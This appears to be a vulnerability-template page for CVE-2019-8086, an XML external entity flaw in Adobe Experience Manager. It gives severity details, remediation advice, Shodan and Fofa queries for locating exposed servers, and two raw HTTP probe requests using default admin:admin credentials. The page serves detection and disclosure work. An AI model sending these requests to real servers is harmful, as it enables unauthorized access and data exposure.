| Title | Adobe Experience Manager - XML External Entity Injection |
|---|---|
| Author | DhiyaneshDk |
| Severity | High |
| Impact | Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, server-side request forgery, and potential remote code execution. |
| Remediation | Apply the necessary security patches provided by Adobe to mitigate the vulnerability. Additionally, ensure that the server is properly configured to restrict access to sensitive files and prevent XXE attacks. |
| CVSS Score | 7.5 |
| EPSS Score | 0.54798 |
| CVE ID | CVE-2019-8086 |
| CWE ID | CWE-611 |
| Shodan Query | http.title:"AEM Sign In"http.component:"Adobe Experience Manager"http.component:"adobe experience manager"http.title:"aem sign in"cpe:"cpe:2.3:a:adobe:experience_manager" |
| Fofa Query | title="aem sign in" |
| Tags | cve cve2019 aem adobe vuln |
Adobe Experience Manager 6.5, 6.4, 6.3 and 6.2 are susceptible to XML external entity injection. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
POST /content/38FZUczJH5I8R6QulGH3TiiHh7v HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
Content-Length: 50
Authorization: Basic YWRtaW46YWRtaW4=
Content-Type: application/x-www-form-urlencoded
Referer: http://www.victim.com
Accept-Encoding: gzip
sling:resourceType=fd/af/components/guideContainer
POST /content/38FZUczJH5I8R6QulGH3TiiHh7v.af.internalsubmit.json HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; ClaudeBot/1.0; +claudebot@anthropic.com)
Connection: close
Content-Length: 136
Authorization: Basic YWRtaW46YWRtaW4=
Content-Type: application/x-www-form-urlencoded
Referer: http://www.victim.com
Accept-Encoding: gzip
guideState={"guideState"%3a{"guideDom"%3a{},"guideContext"%3a{"xsdRef"%3a"","guidePrefillXml"%3a"<afData>\u0041\u0042\u0043</afData>"}}}
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-8086.yaml
🦈 Packet Capture: ⬇️ Download cve-2019-8086.pcap
N/AN/A